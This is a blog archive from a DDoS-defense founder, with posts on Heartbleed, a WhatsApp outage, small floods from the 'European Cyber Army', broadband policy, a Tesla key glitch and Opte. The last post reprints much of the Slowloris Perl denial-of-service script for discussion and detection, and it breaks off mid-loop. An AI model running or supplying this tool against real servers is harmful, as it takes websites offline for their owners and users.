Defense.Net Squashes The Heartbleed Bug

April 9th, 2014 by Barrett Lyon
From http://heartbleed.com (CVE-2014-0160):

“The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.“

Unless an OpenSSL implementation has been patched, anyone can remotely read a server's memory in 64 KB chunks. Said another way, whatever was left behind in the memory of a vulnerable server becomes public data: passwords, accounts, personal data, and even the SSL private keys of the server itself!
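
As a quick sanity check (a minimal sketch of my own, not an official tool), you can at least see whether a machine's OpenSSL build falls in the affected range: 1.0.1 through 1.0.1f are vulnerable, 1.0.1g and later are fixed. Keep in mind that some vendors backport the fix without changing the version letter.

import re
import subprocess

# Builds reporting OpenSSL 1.0.1 through 1.0.1f are in the affected range.
VULNERABLE = re.compile(r"OpenSSL 1\.0\.1[a-f]?\b")

def openssl_banner() -> str:
    # Assumes the standard `openssl` binary is on the PATH.
    return subprocess.run(["openssl", "version"], capture_output=True, text=True).stdout.strip()

if __name__ == "__main__":
    banner = openssl_banner()
    print(banner)
    if VULNERABLE.search(banner):
        print("Version string is in the affected 1.0.1-1.0.1f range; verify whether your vendor backported the fix, then re-key.")
    else:
        print("Version string is outside the affected range.")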

To give you an idea of how big a problem this is, the software is used in everything from web sites and VPNs to specialized networking equipment, email servers, and phone apps; you name it.

At least half a million web sites are exposed, and this may be one of the most catastrophic bugs in the history of secure computing.

Whether this is an accidental bug or an intentional addition is still speculation at this point; either way, it has been in the software for over two years, exposing anyone using OpenSSL.

To make matters worse, once the bug has been patched globally, it's highly likely that every SSL certificate that has been on an exposed server will have to be re-issued, creating an absolute logistical and security nightmare.

The cost of replacing half a million SSL certificates could run to several hundred million dollars, and it's unclear when, or whether, that can happen.

How Defense.Net squashes the Heartbleed Bug

My company, Defense.Net, has built a secure network whose primary purpose is to provide DDoS mitigation.  However, the safeguards we put in place with our proprietary DefenseD scrubbing system to protect against DDoS attacks also protect against the Heartbleed attack vector.

The byproduct of DDoS defense in this case is a better, more protected network, and it further explains why DDoS defense is about more than keeping your sites online when they're attacked with hundreds of gigabits of garbage: these are full defensive networks.  In the process of cleaning up invalid bots and removing attack traffic, we also validate legitimate protocol behavior and reject the illegitimate.  This ability to safeguard our customers from more than just DDoS attacks helps outline our goals and the future of our network.

We're capable of doing this because we use a proprietary SSL implementation on one layer of our network, and on another layer we can monitor and block traffic that attempts to exploit the bug.
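
To make the protocol-level idea concrete, here is a simplified sketch of my own (it is not our DefenseD system): a TLS heartbeat record (content type 24, RFC 6520) that claims a larger payload than the record it arrived in can carry is, by definition, an exploit attempt.

import struct

HEARTBEAT = 24  # TLS record content type for heartbeat messages (RFC 6520)

def looks_like_heartbleed(record: bytes) -> bool:
    """Return True if a raw TLS record claims more heartbeat payload than it actually carries."""
    if len(record) < 8 or record[0] != HEARTBEAT:
        return False
    (record_len,) = struct.unpack(">H", record[3:5])   # length from the TLS record header
    (claimed_len,) = struct.unpack(">H", record[6:8])  # payload length claimed by the heartbeat
    # A legitimate heartbeat needs 1 byte of type, 2 bytes of length,
    # the payload itself, and at least 16 bytes of padding.
    return claimed_len + 1 + 2 + 16 > record_len

if __name__ == "__main__":
    # A hostile request: the record says it is 8 bytes long, but the heartbeat
    # inside claims a 16,384-byte payload -- the classic Heartbleed probe.
    evil = bytes([HEARTBEAT, 3, 2]) + struct.pack(">H", 8) + bytes([1]) + struct.pack(">H", 0x4000)
    print(looks_like_heartbleed(evil))  # True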

What’s going on with WhatsApp?

February 22nd, 2014 by Barrett Lyon

WhatsApp went down today around 8:30 AM Pacific and was lights out for about six hours; it still continues to struggle to connect users to its network.  In addition, even when connected, it's not possible to share images, videos, or audio.

Looking at their network design, they appear to have all their eggs in one basket. The application initially connects to the host "c.whatsapp.net", which is hosted on a single /24 block at SoftLayer (a mid-tier hosting provider):

c.whatsapp.net. 3600 IN A 50.22.231.54
c.whatsapp.net. 3600 IN A 50.22.231.55
c.whatsapp.net. 3600 IN A 50.22.231.56
c.whatsapp.net. 3600 IN A 50.22.231.57
c.whatsapp.net. 3600 IN A 50.22.231.58
c.whatsapp.net. 3600 IN A 50.22.231.59
c.whatsapp.net. 3600 IN A 50.22.231.60
c.whatsapp.net. 3600 IN A 50.22.231.36
c.whatsapp.net. 3600 IN A 50.22.231.44
c.whatsapp.net. 3600 IN A 50.22.231.45
c.whatsapp.net. 3600 IN A 50.22.231.46
c.whatsapp.net. 3600 IN A 50.22.231.47
c.whatsapp.net. 3600 IN A 50.22.231.48
c.whatsapp.net. 3600 IN A 50.22.231.49
c.whatsapp.net. 3600 IN A 50.22.231.50
c.whatsapp.net. 3600 IN A 50.22.231.51
c.whatsapp.net. 3600 IN A 50.22.231.52
c.whatsapp.net. 3600 IN A 50.22.231.53

50.22.231.0/24 appears to host all of the c.whatsapp.net hosts, which makes the service vulnerable to DDoS attacks and hijacking.  It's generally bad design to put all of your critical services on a single block that's routed to a single network provider in a single location.
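
The check itself is easy to reproduce; here is a rough sketch of my own (results will differ from the records above whenever WhatsApp changes its DNS):

import socket
from ipaddress import ip_network

def records_in_single_slash24(hostname: str) -> bool:
    # gethostbyname_ex returns (canonical name, aliases, list of A records).
    _, _, addrs = socket.gethostbyname_ex(hostname)
    nets = {ip_network(f"{a}/24", strict=False) for a in addrs}
    print(f"{hostname}: {len(addrs)} A records across {len(nets)} /24 block(s): "
          + ", ".join(sorted(str(n) for n in nets)))
    return len(nets) == 1

if __name__ == "__main__":
    records_in_single_slash24("c.whatsapp.net")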

In addition, 184.173.136.0/24 is at the same datacenter with the same provider and hosts a bunch of the MMS and chat functions of the application… which were also not working properly.

Design aside, the SoftLayer network looks healthy: there are no indications of a volumetric DDoS attack, such as added latency or jitter, and the network itself appears to be up and working just fine.

So what's wrong?  Well, the c.whatsapp.net IP addresses are not answering reliably on port 443.  Sometimes connections open and function and sometimes they don't.  That suggests one of three things is going on (a quick reachability check like the sketch after this list can confirm the symptom):

  • Application layer DDoS on port 443 (SSL) to their c.whatsapp.net host
  • Application bug
  • Extreme growth
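
Here's the kind of quick reachability sketch I mean (my own illustration; the hostname and numbers are just what I happened to probe):

import socket
import time

def probe(host: str, port: int = 443, attempts: int = 20, timeout: float = 5.0) -> None:
    ok = 0
    for _ in range(attempts):
        try:
            # Only tests whether the TCP handshake completes, which is exactly
            # what was failing intermittently for c.whatsapp.net.
            with socket.create_connection((host, port), timeout=timeout):
                ok += 1
        except OSError:
            pass
        time.sleep(1)
    print(f"{host}:{port} -> {ok}/{attempts} connection attempts succeeded")

if __name__ == "__main__":
    probe("c.whatsapp.net")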

Given that this has gone on all day, I would expect a simple bug to have been fixed by now.

So… is it an application layer DDoS attack?  I don't know.  The Facebook acquisition angered a lot of users and the timing of the outage looks pretty suspect; however, calling it a DDoS is still speculative.  The service has been stable for me for years.

If I were to guess: it's a rapid-growth problem that helped them discover new limits in either their firewall hardware or their load balancers.  Those tend to be the things that break first, and replacing or upgrading hardware like a load balancer in a matter of hours is typically not easy.

Regardless of whether it's an application layer DDoS attack or just unprecedented growth, I am really worried about their design… It reminds me of the early days of Twitter.

P.S.:  I wish the team at WhatsApp the best of luck getting this fixed, whatever it is…  I miss chatting with my friends.

The European Cyber Army Has Bits

January 31st, 2014 by Barrett Lyon

After enough taunting, the European Cyber Army (ECA) launched a modest attack against blyon.com.  The traffic has yet to exceed 1 Gbps, and it's composed of a smorgasbord of attack methods:

Initially the attack came in as an HTTP HEAD and GET flood requesting different items from my site.  Shortly after, a DNS reflection attack and an ICMP reflection attack hit blyon.com as well.

The HEAD attack was directed at a single image and carried a User-Agent of "ICAP-IOD".

The GET flood carried a User-Agent of "LOWC=@ECA_Legion&ID=1391196316226".
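
Because those User-Agent strings are hard-coded, this kind of traffic is trivial to pick out of an access log. A rough sketch of my own (it assumes a standard combined-format log where the User-Agent is the last quoted field):

import re
import sys
from collections import Counter

# In combined log format, the User-Agent is the last quoted field on each line.
UA = re.compile(r'"([^"]*)"\s*$')

def top_user_agents(path: str, n: int = 10) -> None:
    counts = Counter()
    with open(path, errors="replace") as fh:
        for line in fh:
            match = UA.search(line)
            if match:
                counts[match.group(1)] += 1
    for agent, hits in counts.most_common(n):
        print(f"{hits:8d}  {agent}")

if __name__ == "__main__":
    top_user_agents(sys.argv[1] if len(sys.argv) > 1 else "access.log")

Strings like "ICAP-IOD" jump straight to the top of that output.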

Luckily, I am the CTO and founder of a DDoS defense company (Defense.Net), so an attack like this against my personal blog is really not a big deal. However, even a modest attack like this would make an unprepared or unprotected web site struggle.  If it was in fact directed at paser.gov or other small unprotected sites, they probably would be impacted.

This is not confirmation that the ECA launched attacks against the targets they boast about.  The attack on me could be from a random user sympathetic to the ECA; however, the ECA Twitter handle does appear as part of the User-Agent string in the attack hitting my server.

If you’re a server administrator at any of their alleged targets, contact me if you saw any of the User-Agents I saw.

Is the “European Cyber Army” Capable of Big DDoS Attacks?

January 31st, 2014 by Barrett Lyon

I follow what's happening in the DDoS world very closely, and when I see banks go down for extended periods of time, that tells me that someone has a large botnet. On Twitter, a group calling itself the "European Cyber Army" claimed credit for the attacks on January 29th. Their claim prompted me to do a little digging and tweeting to learn more.

I wrote a blog post loaded with items that would intentionally irritate them, because I wanted to see what kind of reaction I would get. It was not met with a warm reception: they began to threaten me on Twitter and hit me with a tiny little 6 Mbps GET flood:

ECA_Legion: …We have a mind to destroy your website!

[I say nothing and an attack starts.]

BarrettLyon: It was a cute GET flood
ECA_Legion: thank you!
BarrettLyon: It didn’t do anything.
BarrettLyon: I guess I was expecting a real DDoS and not a cute one.
ECA_Legion: If we want the site to go down we will hit it! Right now we are busy on an important target!
ECA_Legion: At times we will threaten and never follow through! But like we said, hit us up when we aren’t busy and we will take it down!
BarrettLyon: Sounds like you’re just finding site outages and reporting them as if you did the DDoS. Your “attack” kinda proves my theory.
ECA_Legion: Believe what you what!
BarrettLyon: I thought you were going to attack me? That’s what you threatened me with right?
ECA_Legion: We did threaten to do that! But sadly your site isn’t injectable! Dammit!
BarrettLyon: What does an injection attack have to do with DDoS?
BarrettLyon: So all this #tangodown stuff is what I thought it was. #faildown
ECA_Legion: You doubt our DDoS abilities?
BarrettLyon: I’m pretty sure that’s what I said.
ECA_Legion: Then you will enjoy the upcoming attacks! Lulz
BarrettLyon: Okay cool, well… I’m going to dinner with my family. Have fun sending me “upcoming attacks”.

At that point I went to dinner, and I have not seen a single DDoS attack since. Meanwhile, they keep tweeting that they're taking sites down and defacing sites with injection attacks.

They may be taking sites down with their 6 Mbps GET flood, but I don't think they're doing it with a 200 Gbps-capable botnet.

So, that raises the question: who is behind the big attacks?

Here Comes the European Cyber Army

January 30th, 2014 by Barrett Lyon

With the disappearance of the Izz ad-Din al-Qassam Cyber Fighters, DDoS attacks have not been at the top of the headlines for a few months. Well, a new group calling itself the "European Cyber Army" (@ECA_Legion or ECA) has been making some news. They claim to be targeting the US military and banks; however, based on their Twitter feed, it appears they are claiming credit for site outages and passing them off as attacks.

They claim to have attacked and downed over 60 web sites, ranging from bankofamerica.com to Japanese retailers, theme parks, US military sites, and numerous other foreign sites.

I found it odd that they were targeting such a wide range of web sites, so I tweeted about the random list of hosts. They responded directly to me with, "@BarrettLyon Casualties of warfare".

What war they are fighting or starting is not exactly clear. They've posted a YouTube propaganda video that basically declares they're mad at nearly everything and everyone.

The Bank of America and Chase attacks made public news, as the attacks clearly impacted their sites. The European Cyber Army tweeted a statement claiming responsibility.

Bank of America's site was unresponsive at the time of the tweet, but it's unclear whether they were merely claiming responsibility or actually carried out the attack.

Following Bank of America, someone launched an attack against chase.com, and the European Cyber Army made similar statements on their Twitter account.

Some large attacks have happened (maybe not carried out by these guys); they appear to have been extremely successful, at rates of around 190 Gbps.  I believe the actual attacks were accomplished with a derivative of Brobot, which is what the al-Qassam Cyber Fighters were using.  There are other rumors that the ECA has some control over the IADAQ botnet, but that does not seem to be true.

To date, the would-be attacks appear to be sprinkled around as they make a stir at each of their targets: they take a site down for a few hours and then shift the focus to a new target. They may be shifting the attacks to create pain at each target without overly exposing their botnet, or they may simply be reporting outages as attacks until the site eventually comes back online.

Who are these guys?  Based on a Pastebin post, they are a group of hackers from LeakSecurity (#LeakSec), possibly people affiliated with @OpFunKill and @oG_maLINKo.

Stay tuned for more updates.

UPDATE:  They didn't like my blog post and threatened to attack me: "We have a mind to destroy your website!"  They did actually attack with a little 5 Mbps GET flood, which was quickly shut off.

I responded with, “@ECA_Legion Sounds like you’re just finding site outages and reporting them as if you did the DDoS. Your ‘attack’ kinda proves my theory.”

The conversation ended with, “@BarrettLyon Believe what you what!”

Still no major attack.

As American Culture Shifts Online… Why Are We Okay with Second-World Internet Connectivity?

January 23rd, 2014 by Barrett Lyon

As a child, I was an early Internet user. There were still .arpa addresses attached to things, and from day one, I realized I was a consumer of the vast data on the Internet. I needed bandwidth to download, view, exchange, and to work faster. And as a child with no job, the dream of having any high-speed access was a distant one. It shaped my career as I started my quest to have as much bandwidth as I needed. Over the course of the startups I have created, I always insisted that the offices connect with top-quality connectivity. The argument goes like this: We’re creating the world’s top new technology, why don’t we have access to it?

Spoiled over the years by having gigabit Ethernet to my desktop, I moved to Auburn, CA in the Sierra Nevada Foothills. Bay Area people may recognize its name because of the famous burger shack Ikeda's that is right up the street from me. It's where my family lives, and I telecommute to work four days a week. But it's difficult to telecommute when your home network connection is inconsistent in latency and available bandwidth, or only works "most of the time." As a result, it has hampered my VoIP calls, my research work, and my ability to do my job. Something had to change. I signed up for a fiber service for businesses that's equivalent in cost to a '90s T1 line.

So what is a gigabit? And so what? Well, first off, it's 1000 Mbps of bandwidth, and if it's delivered over fiber, it has latency an order of magnitude lower than a cable modem or DSL. So I bought burstable bandwidth: I only need about 10 Mbps of the total 1000, but the ISP allows me to use all 1000 when it's available and nobody else is using it. It's a great deal for me, and it's really no sweat for the carrier.

BUT NOW WHAT?

Why should everyone have burstable 1 Gigabit or 10 Gigabit service? Because the world has changed. People now consume bandwidth on most of their devices, cars, TVs, AppleTVs, Google services, etc… and it’s important to our daily lives. Lack of fast connectivity is like settling for tainted brown water from your local water utility, or having your lights shut off when you use an electric oven. People, we’re living in the stone ages of the Internet and we need to progress!

One of the main impacts of switching to an Ethernet-based solution is that your upload speed does not (and should not) impact your download speed. For years, ISPs have used asymmetric speeds as a marketing mechanism to differentiate "business class" services from "home services." They needed a reason to charge businesses a boatload of money for their Internet access while providing something similar to home users for a fraction of the cost. The marketing decision matched well with cable modem DOCSIS and DSL technology, and as a result, became the standard for home Internet services.

That bandwidth model worked well for the 90s, but the Internet has changed. With a real Internet connection, we can download as fast as most storage devices can store, and fully utilize cloud services. HD videos play instantly, while not impacting overall network performance. Web pages snap into place, and everything just works better. Beyond being an Internet consumer, with a real Internet connection you can create – as well as consume. Uploading and serving content gives a user the ability to be more than just a consumer. This is an ideological change. When it affects millions, the Internet and culture will be directly impacted. The Internet will not be made of servers and users anymore, because everyone will have the capacity to be both.

Imagine if the new gold standard of home Internet connectivity was full duplex (the same speed both ways at the same time) 1GbE. Those huge HD files off HD cameras would then find their way onto the web very quickly. Sharing content between friends would no longer be done via a third-party service like Dropbox. The Internet would depend more on the cloud as the Internet connection, reducing the bottleneck between cloud services and the user. In addition, person-to-person networks would become feasible. It would spark innovation. Startups that are network-based could be hosted from your garage. Bandwidth would no longer be expensive, and networks would have a new renaissance of growth.

Beyond just the ability to upload at a reasonable rate, we would see our home networks become more stable. We would have fewer angry calls to call centers because "the cable modem starts blinking a weird color when it's raining outside." The jitter of the network would be gone, and we'd no longer be consumers of a poor-quality service; we would have something we could trust to build a network-based society on.

All media companies should be pushing cable operators to switch everyone to gigabit Ethernet or faster. Why? Because subscribers will consume (buy) more content. Right now on a gigabit circuit, it takes less than three minutes to download an entire HD movie from iTunes. People would use services like Netflix much more because they would work so much better than anything else out there.
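
The back-of-envelope math is simple (my own numbers; the few-gigabyte size of an HD movie is an assumption, not a figure from iTunes):

def transfer_seconds(size_gb: float, link_mbps: float) -> float:
    bits = size_gb * 8 * 1e9           # decimal gigabytes to bits
    return bits / (link_mbps * 1e6)    # megabits per second to bits per second

for size_gb in (4, 5, 20):
    print(f"{size_gb} GB at 1 Gbps: ~{transfer_seconds(size_gb, 1000):.0f} seconds")
# Roughly 32 s, 40 s, and 160 s -- so "under three minutes" holds with plenty of
# headroom, even before accounting for protocol overhead.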

So, what about the cost?

For an early adopter, it's not easy. It's expensive, because you have to buy what's essentially a business-class or carrier-class service. For the provider, however, the cost is nothing compared to copper cable, and here's why:

  • Physical copper cable costs more than fiber
  • Replacing cable that is faulty is expensive and should just be done with fiber
  • The equipment is inexpensive
  • Support costs go down due to fewer interruptions
  • Service quality increases

What about the arguments that uploaded content costs ISPs more, or that it will cost more to upgrade their networks? To that I say: I don't see any telecommunications companies filing for bankruptcy. Innovation, social change, and inspiration bring customers. Their networks can support bi-directional communications. Companies like Comcast would love to make you think that it's a huge burden to carry traffic out of their network, but because Ethernet is inherently bi-directional, if Comcast can support a given amount of inbound bandwidth to its customers, it can rationally support the same outbound bandwidth.

In 2009, the American Recovery and Reinvestment Act (Recovery Act) was chartered by President Obama to create a National Broadband Plan. The plan itself is about as effective as the HealthCare.gov website. However, unlike HealthCare.gov, the plan actually does not do anything for the consumer. It lays out a lot of legal liability for carriers such as Comcast to reduce their operating costs, but it falls horribly short of making any real guidelines that will impact the future. The plan states, "Goal No. 1: At least 100 million U.S. homes should have affordable access to actual download speeds of at least 100 megabits per second and actual upload speeds of at least 50 megabits per second." It suggests that should happen in the next DECADE. Ten years from now, my thermostat will have more bandwidth than that – actually, it does already. Hmm, okay, in ten years my phone will have more bandwidth than that. Hmm, it almost does today. What they've done is spend a huge amount of time and money to create short-sighted goals. It should have read, "By X date, all Americans with at least X connectivity will be provided full bidirectional service of at least 1000 Mbps."

When it comes down to it, consumers need to demand more – not just from their ISPs, but from elected officials who have shown no true leadership. This country should be a leader in broadband, not a mess of red tape lacking any vision.

Our first “breakdown” with our Tesla Model S

September 20th, 2013 by Barrett Lyon

We've been purely ecstatic with our Tesla since the moment we decided to go forward with it. It really is the car that everyone boasts about. But as with any new car, I was still somewhat worried about it having a bad day. That bad day came last Monday, when we parked at the local airport and then tried to drive it home. The car would not recognize the keys and would not turn on.  It just sat there with the AC on and the stereo going, displaying "Key Not Inside."

We called Tesla's support line and ran through a bunch of options to get the keys recognized again – none worked. The car was just stuck where we parked it. They spoke with their engineers and decided the car needed a "cluster reboot," which they issued remotely to the console cluster. Apparently the "cluster" is the set of gauges behind the steering wheel, controlled by a dedicated computer, and that computer also controls the key system.

After a few hours of fooling around and being on the phone, the keys were finally working again. However, this raises the question: how the hell did that happen?

This is where Tesla got a little vague and promised it would never happen again. I got into a semantic disagreement with them over the words "glitch" and "software bug." They finally gave up and said, "We don't know why this happened, it's only happened to 3 other people I have spoken with." So this has happened to more people than just us.

Finally, they escalated the issue to an engineer and the answer was, “The keys are highly sensitive to radio frequencies, and at airports there are a lot of different things going on with radio frequencies.”

This answer did not really help, and I could not stop thinking about a scenario where someone figures out how to deactivate Tesla keys with a simple radio device – and could then disable all of the cars parked at a Supercharger station.

It also made me think hard about what a botched software update or decent software hack could do to thousands of cars.

Anyhow, we were told it shouldn’t happen again, but if it does, we can simply “reboot the cluster” and it would be fine.

My answer to them was, “Isn’t that how Microsoft told people to deal with their bugs?”

PS:  I still love the car and yes… they were able to remotely fix it.  :)

Opte and LGL 1.2

April 16th, 2013 by Barrett Lyon

It’s been several years since I have released a new “opte” image of the Internet.  I started working on the new images last week and I have run into a number of issues:

A)  LGL (large graph layout) 1.1 is outdated and needs to be fixed.  I'm currently trying to get the code to function in JRE 1.6 (for the viewer application).  I also want to create fixed points on the image for the largest networks, which will allow me to create full-motion animations of the Internet day by day.  I'm taking over the LGL project from its creator, Alex Adai, and we will be releasing LGL 1.2 very soon.

B)  The web site is outdated.  I'd like to replace it with a WordPress blog skin that is unique and works well.  There I will release the entire Opte package with the updated LGL 1.2 release, which should give people the ability to create their own images.

C)  I'd like to connect with some educators about the image to see if it's possible to create teaching curriculum for children in grades K-12.  I think children are woefully uneducated about how networking works.  Our lives depend on the Internet, and yet we don't teach networking basics to children.  It's very painful for me to watch this generation grow up trusting that devices will just work.  Launching the new image will give me, and whoever is interested, a nice launching pad for discussions around this topic.

If you’re interested in helping at any level, please contact me.

Interesting DDoS Attack Tool Of The Week: Slowloris

April 2nd, 2013 by Barrett Lyon

I often run into interesting DDoS-related items in the wild.  Rather than talking about them internally, I find it fitting to discuss them openly and publicly.

On April 2nd we found this rather interesting script floating around in the wild.  It's been around since at least 2012, but it seems to be circulating a little more now.  The script is named Slowloris and is designed to eat up a small web server's available sockets or its worker threads.  It's not a new concept or attack vector, but it's interesting to see people writing scripts that attempt to exploit hard-coded server limitations.

It's cutely documented, and the fact that it has hard-coded headers makes it fairly easy to detect.  It even states, "Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices".
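
For what it's worth, the connection pattern is just as easy to spot as the headers. A rough detection sketch of my own (not part of the script below; it assumes the third-party psutil package and may need elevated privileges to see other processes' sockets): a handful of client IPs each holding hundreds of established, mostly idle connections to your web port is the signature Slowloris leaves.

from collections import Counter

import psutil  # third-party: pip install psutil

def connection_counts(local_port: int = 80) -> Counter:
    counts = Counter()
    for conn in psutil.net_connections(kind="tcp"):
        if (conn.status == psutil.CONN_ESTABLISHED
                and conn.laddr and conn.laddr.port == local_port
                and conn.raddr):
            counts[conn.raddr.ip] += 1
    return counts

if __name__ == "__main__":
    for ip, open_conns in connection_counts().most_common(10):
        flag = "  <-- worth a closer look" if open_conns > 100 else ""
        print(f"{ip:>15}  {open_conns} open connections{flag}")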

Here it is:


#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
 .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
.  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
     .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
  'shost=s'   => \$shost,
  'dns=s'     => \$host,
  'httpready' => \$httpready,
  'num=i'     => \$connections,
  'cache'     => \$cache,
  'port=i'    => \$port,
  'https'     => \$ssl,
  'tcpto=i'   => \$tcpto,
  'test'      => \$test,
  'timeout=i' => \$timeout,
  'version'   => \$version,
);
if ($version) {
  print "Version 0.7\n";
  exit;
}
unless ($host) {
  print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
  print "\n\tType 'perldoc $0' for help with options.\n\n";
  exit;
}
unless ($port) {
  $port = 80;
  print "Defaulting to port 80.\n";
}
unless ($tcpto) {
  $tcpto = 5;
  print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
  unless ($timeout) {
      $timeout = 100;
      print "Defaulting to a 100 second re-try timeout.\n";
  }
  unless ($connections) {
      $connections = 1000;
      print "Defaulting to 1000 connections.\n";
  }
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
  print "Multithreading enabled.\n";
  $usemultithreading = 1;
  use threads;
  use threads::shared;
}
else {
  print "No multithreading capabilites found!\n";
  print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
  $sendhost = $shost;
}
else {
  $sendhost = $host;
}
if ($httpready) {
  $method = "POST";
}
else {
  $method = "GET";
}
if ($test) {
  my @times = ( "2", "30", "90", "240", "500" );
  my $totaltime = 0;
  foreach (@times) {
      $totaltime = $totaltime + $_;
  }
  $totaltime = $totaltime / 60;
  print "This test could take up to $totaltime minutes.\n";
  my $delay   = 0;
  my $working = 0;
  my $sock;
  if ($ssl) {
      if (
          $sock = new IO::Socket::SSL(
              PeerAddr => "$host",
              PeerPort => "$port",
              Timeout  => "$tcpto",
              Proto    => "tcp",
          )
        )
      {
          $working = 1;
      }
  }
  else {
      if (
          $sock = new IO::Socket::INET(
              PeerAddr => "$host",
              PeerPort => "$port",
              Timeout  => "$tcpto",
              Proto    => "tcp",
          )
        )
      {
          $working = 1;
      }
  }
  if ($working) {
      if ($cache) {
          $rand = "?" . int( rand(99999999999999) );
      }
      else {
          $rand = "";
      }
      my $primarypayload =
          "GET /$rand HTTP/1.1\r\n"
        . "Host: $sendhost\r\n"
        . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
        . "Content-Length: 42\r\n";
      if ( print $sock $primarypayload ) {
          print "Connection successful, now comes the waiting game...\n";
      }
      else {
          print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
          print "Is something wrong?\nDying.\n";
          exit;
      }
  }
  else {
      print "Uhm... I can't connect to $host:$port.\n";
      print "Is something wrong?\nDying.\n";
      exit;
  }
  for ( my $i = 0 ; $i <= $#times ; $i++ ) {
      print "Trying a $times[$i] second delay: \n";
      sleep( $times[$i] );
      if ( print $sock "X-a: b\r\n" ) {
          print "\tWorked.\n";
          $delay = $times[$i];
      }
      else {
          if ( $SIG{__WARN__} ) {
              $delay = $times[ $i - 1 ];
              last;
          }
          print "\tFailed after $times[$i] seconds.\n";
      }
  }
  if ( print $sock "Connection: Close\r\n\r\n" ) {
      print "Okay that's enough time. Slowloris closed the socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
  }
  else {
      print "Remote server closed socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
  }
  if ( $delay < 166 ) {
      print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all...  you might have trouble using Slowloris against this target.  You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
  }
}
else {
  print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
  if ($usemultithreading) {
      domultithreading($connections);
  }
  else {
      doconnections( $connections, $usemultithreading );
  }
}
sub doconnections {
  my ( $num, $usemultithreading ) = @_;
  my ( @first, @sock, @working );
  my $failedconnections = 0;
  $working[$_] = 0 foreach ( 1 .. $num );    #initializing
  $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
  while (1) {
      $failedconnections = 0;
      print "\t\tBuilding sockets.\n";
      foreach my $z ( 1 .. $num ) {
          if ( $working[$z] == 0 ) {
